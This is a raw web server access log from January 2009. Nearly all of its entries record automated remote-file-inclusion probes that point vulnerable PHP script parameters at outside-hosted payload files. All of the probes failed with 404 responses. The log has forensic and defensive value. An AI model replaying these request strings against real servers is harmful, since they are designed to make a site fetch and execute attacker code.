89.36.165.22 - - [06/Jan/2009:04:00:16 -0800] "GET /atom.php5?page=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:00:16 -0800] "GET /logs/access_081224.log//atom.php5?page=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:00:16 -0800] "GET /logs//atom.php5?page=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
74.6.28.104 - - [06/Jan/2009:04:00:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.web20milliondollarhomepage.com"
74.6.30.105 - - [06/Jan/2009:04:00:30 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:00:40 -0800] "GET /logs/access_081208.log//atom.php5?page=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:02:52 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:02:52 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:02:53 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:03:03 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:03:03 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.50.210.69 - - [06/Jan/2009:04:03:03 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
154.11.13.142 - - [06/Jan/2009:04:03:51 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
154.11.13.142 - - [06/Jan/2009:04:03:52 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
154.11.13.142 - - [06/Jan/2009:04:03:52 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
208.80.194.54 - - [06/Jan/2009:04:05:08 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; Seekmo 10.0.341.0)" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:06:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:06:13 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:06:13 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:06:29 -0800] "GET /logs/access_081224.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:06:51 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:06:52 -0800] "GET /include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:04:07:26 -0800] "GET /logs/access_081214.log/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:04:07:26 -0800] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:04:07:27 -0800] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:05 -0800] "GET /logs/access_081118.log/errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:05 -0800] "GET /errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:06 -0800] "GET /logs/errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:16 -0800] "GET /logs/access_081118.log/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:17 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:09:17 -0800] "GET /logs/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
83.222.23.200 - - [06/Jan/2009:04:10:15 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:04:12:13 -0800] "GET /logs/access_081208.log//?path%5Bdocroot%5D=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:04:12:23 -0800] "GET /logs/access_081208.log//?path%5Bdocroot%5D=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:04:12:43 -0800] "GET /logs/access_081208.log//?path%5Bdocroot%5D=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:13:02 -0800] "GET /include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
70.86.113.106 - - [06/Jan/2009:04:14:08 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
70.86.113.106 - - [06/Jan/2009:04:14:08 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
70.86.113.106 - - [06/Jan/2009:04:14:08 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:16:12 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:16:13 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:16:13 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:17:40 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:17:40 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:17:41 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:19:07 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:19:10 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:19:42 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:19:45 -0800] "GET /errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
208.111.154.35 - - [06/Jan/2009:04:20:17 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:22:25 -0800] "GET /logs/access_081224.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:22:30 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:22:30 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:22:31 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:22:53 -0800] "GET /ashnews.php?pathtoashnews=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:22:53 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:22:53 -0800] "GET /logs//ashnews.php?pathtoashnews=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:23:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:23:27 -0800] "GET /include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:23:46 -0800] "GET /logs/access_081224.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:24:52 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
205.231.144.152 - - [06/Jan/2009:04:24:55 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:25:00 -0800] "GET /!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:25:00 -0800] "GET /logs/access_081214.log/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:25:00 -0800] "GET /logs/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:03 -0800] "GET /logs/access_081207.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:03 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:03 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:04 -0800] "GET /logs/access_081207.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:04 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:49 -0800] "GET /logs/access_081214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.web20milliondollarhomepage.com"
81.176.226.164 - - [06/Jan/2009:04:25:49 -0800] "GET /logs/access_081214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:26:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:26:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:27:20 -0800] "GET /logs/access_081224.log//include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:27:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:27:20 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:27:26 -0800] "GET /logs/access_081208.log/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:27:40 -0800] "GET /logs/access_081006.log/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.239.227.49 - - [06/Jan/2009:04:27:41 -0800] "GET /logs/access_081006.log/errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:28:33 -0800] "GET /logs/access_081224.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:03 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:03 -0800] "GET /logs/access_081224.log//newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:03 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:07 -0800] "GET /logs/access_081208.log//newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:28 -0800] "GET /Neos_Chronos/header.php?base_folder=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:28 -0800] "GET /logs/access_081224.log//Neos_Chronos/header.php?base_folder=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:28 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:53 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:53 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:30:53 -0800] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:31:21 -0800] "GET /logs/access_081208.log//agendax/addevent.inc.php?agendax_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:46 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:46 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:47 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:55 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:55 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:31:56 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
194.88.108.72 - - [06/Jan/2009:04:32:28 -0800] "GET /include/admin.lib.inc.php?site_path=http://jullariamo.helloweb.net/scan/happyid2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:04:33:59 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
